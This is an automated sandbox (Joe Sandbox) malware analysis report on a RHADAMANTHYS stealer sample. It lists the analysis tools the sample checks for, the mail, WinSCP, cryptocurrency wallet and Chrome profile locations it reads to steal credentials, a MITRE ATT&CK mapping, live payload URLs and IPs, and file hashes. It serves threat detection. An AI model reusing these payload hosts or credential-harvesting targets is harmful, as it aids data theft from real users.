Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035ADD000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OllyDbg.exe
Source: 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tcpview.exe
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035ADD000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Wireshark.exe
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035ADD000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lordpe.exe
Source: 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Procmon.exe
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035ADD000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: autoruns.exe
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035ADD000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: regmon.exe

Stealing of Sensitive Information

Yara detected RHADAMANTHYS Stealer

Source: Yara match

File source: Process Memory Space: 64Tgzu2FKh.exe PID: 4832, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\System32\certreq.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\System32\certreq.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security

Jump to behavior

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\System32\certreq.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt			Jump to behavior
Source: C:\Windows\System32\certreq.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\257d7e53-7c95-4bfc-a725-90881a0e607e	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior

Remote Access Functionality

Yara detected RHADAMANTHYS Stealer

Source: Yara match

File source: Process Memory Space: 64Tgzu2FKh.exe PID: 4832, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Obfuscated Files or Information	1 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 DLL Side-Loading	1 Credentials in Registry	25 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	11 Process Injection	1 File Deletion	Security Account Manager	321 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Registry Run Keys / Startup Folder	1 Masquerading	NTDS	23 Virtualization/Sandbox Evasion	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	23 Virtualization/Sandbox Evasion	LSA Secrets	1 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	12 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Process Injection	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
64Tgzu2FKh.exe	12%	Virustotal		Browse
64Tgzu2FKh.exe	14%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://http:///etc/puk.keyMachineGuid	0%	Avira URL Cloud	safe
http://bluemaxxlaser.com/rh/rheu.bin00W#	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Avira URL Cloud	safe
http://bluemaxxlaser.com/rh/rheu.binIf	0%	Avira URL Cloud	safe
https://discord.com	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Virustotal		Browse
http://www.oruddho.com	0%	Avira URL Cloud	safe
http://bluemaxxlaser.com/rh/rheu.bin2	0%	Avira URL Cloud	safe
http://bluemaxxlaser.com/rh/rheu.bincf	0%	Avira URL Cloud	safe
https://discord.com	0%	Virustotal		Browse
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Avira URL Cloud	safe
http://bluemaxxlaser.com/rh/rheu.binz	0%	Avira URL Cloud	safe
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Avira URL Cloud	safe
http://bluemaxxlaser.com/rh/rheu.bin	0%	Avira URL Cloud	safe
http://bluemaxxlaser.com/rh/rheu.binX	0%	Avira URL Cloud	safe
http://bluemaxxlaser.com/	0%	Avira URL Cloud	safe
http://bluemaxxlaser.com/rh/rheu.binBfk	0%	Avira URL Cloud	safe
http://www.gopher.ftp://ftp.	0%	Avira URL Cloud	safe
https://http:///etc/puk.keyGET13ConnectionupgradeUpgradewebsocketUser-AgentAccept-Encodinggzip	0%	Avira URL Cloud	safe
http://bluemaxxlaser.com/rh/rheu.binGoucsFllalramsyadvocates.co	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bluemaxxlaser.com	203.175.174.69	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://bluemaxxlaser.com/rh/rheu.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://bluemaxxlaser.com/rh/rheu.bin00W#	64Tgzu2FKh.exe, 0000000B.00000002.2114909158.0000000005748000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://bluemaxxlaser.com/rh/rheu.binIf	64Tgzu2FKh.exe, 0000000B.00000003.2047710499.0000000005797000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000002.2115468679.0000000005794000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com	certreq.exe, 0000000C.00000003.2362710242.0000022346F02000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://http:///etc/puk.keyMachineGuid	certreq.exe, 0000000C.00000003.2269437994.0000022346BC9000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2262285186.0000022346BCF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	64Tgzu2FKh.exe, 0000000B.00000001.1367127206.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.oruddho.com	64Tgzu2FKh.exe, 00000000.00000003.855612399.000000000299D000.00000004.00000020.00020000.00000000.sdmp, bn.txt.0.dr	false	Avira URL Cloud: safe	unknown
http://bluemaxxlaser.com/rh/rheu.bin2	64Tgzu2FKh.exe, 0000000B.00000002.2114909158.0000000005748000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://bluemaxxlaser.com/rh/rheu.bincf	64Tgzu2FKh.exe, 0000000B.00000003.2047710499.0000000005797000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000002.2115468679.0000000005794000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discordapp.com	certreq.exe, 0000000C.00000003.2362710242.0000022346F02000.00000004.00000020.00020000.00000000.sdmp	false		high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	64Tgzu2FKh.exe, 0000000B.00000001.1367127206.0000000000649000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://bluemaxxlaser.com/rh/rheu.binz	64Tgzu2FKh.exe, 0000000B.00000002.2114909158.0000000005748000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	64Tgzu2FKh.exe, 0000000B.00000001.1367127206.0000000000649000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	64Tgzu2FKh.exe, 0000000B.00000001.1367127206.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://bluemaxxlaser.com/rh/rheu.binX	64Tgzu2FKh.exe, 0000000B.00000002.2114909158.0000000005748000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://bluemaxxlaser.com/	64Tgzu2FKh.exe, 0000000B.00000003.2047710499.0000000005797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://bluemaxxlaser.com/rh/rheu.binBfk	64Tgzu2FKh.exe, 0000000B.00000003.2047710499.0000000005797000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000002.2115468679.0000000005794000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	64Tgzu2FKh.exe	false		high
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD	64Tgzu2FKh.exe, 0000000B.00000001.1367127206.0000000000626000.00000020.00000001.01000000.00000006.sdmp	false		high
http://www.gopher.ftp://ftp.	64Tgzu2FKh.exe, 0000000B.00000001.1367127206.0000000000649000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
https://http:///etc/puk.keyGET13ConnectionupgradeUpgradewebsocketUser-AgentAccept-Encodinggzip	certreq.exe, 0000000C.00000003.2358519610.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2364067131.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2294813354.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2381391720.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2347137342.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2337010943.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2348460528.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2293648309.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2323288558.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2367034008.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2356041253.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2309566932.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2368527161.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2281491024.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2360225839.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2325891080.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2403232155.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2361474795.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2391200900.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2277711632.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2271900087.0000022346F02000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://bluemaxxlaser.com/rh/rheu.binGoucsFllalramsyadvocates.co	64Tgzu2FKh.exe, 0000000B.00000002.2127439633.0000000034F70000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
203.175.174.69	bluemaxxlaser.com	Singapore		24482	SGGS-AS-APSGGSSG	false
45.66.230.155	unknown	Germany		33657	CMCSUS	false

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	880188
Start date and time:	2023-06-01 22:29:15 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 17m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	64Tgzu2FKh.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/8@1/2
EGA Information:	Successful, ratio: 33.3%
HDC Information:	Successful, ratio: 86.3% (good quality ratio 84.8%) Quality average: 87.4% Quality standard deviation: 21.6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 61 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, spclient.wg.spotify.com, evoke-windowsservices-tas.msedge.net, ctldl.windowsupdate.com, storeedgefd.dsx.mp.microsoft.com
Execution Graph export aborted for target 64Tgzu2FKh.exe, PID 4832 because there are no executed function
Execution Graph export aborted for target certreq.exe, PID 9536 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
203.175.174.69	zp.exe	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	bluemaxxlaser.com/rh/rh.bin
	eua.ps1	Get hash	malicious	GuLoader	Browse	www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
	zp.ps1	Get hash	malicious	Unknown	Browse	www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
	zk.ps1	Get hash	malicious	Unknown	Browse	www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
	mx.ps1	Get hash	malicious	Unknown	Browse	www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
	zpeu.exe	Get hash	malicious	GuLoader	Browse	bluemaxxlaser.com/rh/rheu.bin
	as.ps1	Get hash	malicious	GuLoader	Browse	www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bluemaxxlaser.com	zp.exe	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	203.175.174.69
	eua.ps1	Get hash	malicious	GuLoader	Browse	203.175.174.69
	zp.ps1	Get hash	malicious	Unknown	Browse	203.175.174.69
	zk.ps1	Get hash	malicious	Unknown	Browse	203.175.174.69
	mx.ps1	Get hash	malicious	Unknown	Browse	203.175.174.69
	zpeu.exe	Get hash	malicious	GuLoader	Browse	203.175.174.69
	as.ps1	Get hash	malicious	GuLoader	Browse	203.175.174.69

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SGGS-AS-APSGGSSG	zp.exe	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	203.175.174.69
	eua.ps1	Get hash	malicious	GuLoader	Browse	203.175.174.69
	zp.ps1	Get hash	malicious	Unknown	Browse	203.175.174.69
	zk.ps1	Get hash	malicious	Unknown	Browse	203.175.174.69
	mx.ps1	Get hash	malicious	Unknown	Browse	203.175.174.69
	zpeu.exe	Get hash	malicious	GuLoader	Browse	203.175.174.69
	as.ps1	Get hash	malicious	GuLoader	Browse	203.175.174.69
	Fe7MaP3DNP.elf	Get hash	malicious	Mirai	Browse	103.14.247.10
	Demon.x86.elf	Get hash	malicious	Unknown	Browse	103.14.247.55
	tebjuOp0kK.elf	Get hash	malicious	Mirai	Browse	103.14.247.35
	7Hhy4dfkst.elf	Get hash	malicious	Mirai	Browse	103.14.247.31
	5HzazUnnF6.elf	Get hash	malicious	Mirai	Browse	103.14.247.75
	4M3ACl2k2v.elf	Get hash	malicious	Unknown	Browse	103.14.247.47
	wget.elf	Get hash	malicious	Unknown	Browse	103.14.247.29
	chB6z5L2GD.elf	Get hash	malicious	Mirai	Browse	103.14.247.10
	86iDRbpkXb.elf	Get hash	malicious	Mirai	Browse	103.14.247.72
	yC34ftIroi.elf	Get hash	malicious	Mirai	Browse	103.14.247.68
	http://singaporeoptometricassociation.com/	Get hash	malicious	Unknown	Browse	203.175.162.79
	PiuV0y8Fw8.elf	Get hash	malicious	Mirai	Browse	103.14.247.49
	BvZi2Dj3LS.elf	Get hash	malicious	Mirai	Browse	103.14.247.26

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dll	eua.ps1	Get hash	malicious	GuLoader	Browse
	zk.ps1	Get hash	malicious	Unknown	Browse
	mx.ps1	Get hash	malicious	Unknown	Browse
	zpeu.exe	Get hash	malicious	GuLoader	Browse
	zpeu.exe	Get hash	malicious	GuLoader	Browse
	as.ps1	Get hash	malicious	GuLoader	Browse
	KwP6qU3cQ8.exe	Get hash	malicious	FormBook, GuLoader	Browse
	KwP6qU3cQ8.exe	Get hash	malicious	GuLoader	Browse
	DB948GHBNJI.xlsx	Get hash	malicious	GuLoader	Browse
	Order-new world foods.xlsx	Get hash	malicious	GuLoader	Browse
	8cAZneRN6B.exe	Get hash	malicious	FormBook, GuLoader	Browse
	8cAZneRN6B.exe	Get hash	malicious	GuLoader	Browse
	fr34veeTGm.exe	Get hash	malicious	FormBook, GuLoader	Browse
	fr34veeTGm.exe	Get hash	malicious	GuLoader	Browse
	ShipmentReceipt9521368040.xlsx	Get hash	malicious	GuLoader	Browse
	njUIPPVrud.exe	Get hash	malicious	FormBook, GuLoader	Browse
	njUIPPVrud.exe	Get hash	malicious	GuLoader	Browse
	ShipmentReceipt93213628045.xlsx	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\rheu[1].bin

Download File

Process:	C:\Users\user\Desktop\64Tgzu2FKh.exe
File Type:	data
Category:	dropped
Size (bytes):	454720
Entropy (8bit):	7.996468822896964
Encrypted:	true
SSDEEP:	12288:0g7BSxexpmRUjQFbjRG7xw/CWmJI/u+nnrP9Gox:DBy2iBMxtWmJI/JDIox
MD5:	E9B9BBF46803F5A7AEF0F8CBAEA6E9DD
SHA1:	B10761683AF514E951271233C0377680D4E0D650
SHA-256:	EB1DA67295D161CB67A774B580B5F8FFB6C17244B1F4072DBFC87FA935A2471C
SHA-512:	8882C5183CBEA0329CA25CD0D4AD85740E2E4A2E3AFFFB46716AF2EF65C3743CF68E7B1DA0D81D76D7F554142DA9BEC3104802A023E0487A9C271D2E806A8F0C
Malicious:	false
Reputation:	low
